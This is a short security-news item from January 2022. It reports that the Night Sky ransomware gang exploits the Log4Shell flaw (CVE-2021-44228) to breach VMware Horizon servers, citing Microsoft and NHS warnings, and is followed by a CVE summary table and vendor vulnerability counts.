Security News > 2022 > January > Night Sky ransomware uses Log4j bug to hack VMware Horizon servers

Night Sky ransomware uses Log4j bug to hack VMware Horizon servers
2022-01-11 11:24

The Night Sky ransomware gang has started to exploit the critical CVE-2021-44228 vulnerability in the Log4j logging library, also known as Log4Shell, to gain access to VMware Horizon systems.

Spotted in late December 2021 by security researcher MalwareHunterTeam, Night Sky ransomware focuses on locking enterprise networks.

On Monday, Microsoft published a warning about a new campaign from a China-based actor it tracks as DEV-0401 to exploit the Log4Shell vulnerability on VMware Horizon systems exposed on the internet, and deploy Night Sky ransomware.

It is believed that Night Sky is a continuation of the aforementioned ransomware operations.

Microsoft notes that Night Sky ransomware operators rely on command and control servers that impersonate domains used by legitimate companies such as cybersecurity firms Sophos, Trend Micro, technology companies Nvidia and Rogers Corporation.

Microsoft's warning comes on the heels of another alert from UK's National Health Service on January 5 about threat actors targeting VMware Horizon deployments with Log4Shell exploits.


News URL

https://www.bleepingcomputer.com/news/security/night-sky-ransomware-uses-log4j-bug-to-hack-vmware-horizon-servers/

Related Vulnerability

DATE CVE VULNERABILITY TITLE RISK
2021-12-10 CVE-2021-44228 Deserialization of Untrusted Data vulnerability in multiple products
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.
10.0

Related vendor

VENDOR LAST 12M #/PRODUCTS LOW MEDIUM HIGH CRITICAL TOTAL VULNS
Vmware 186 83 403 203 107 796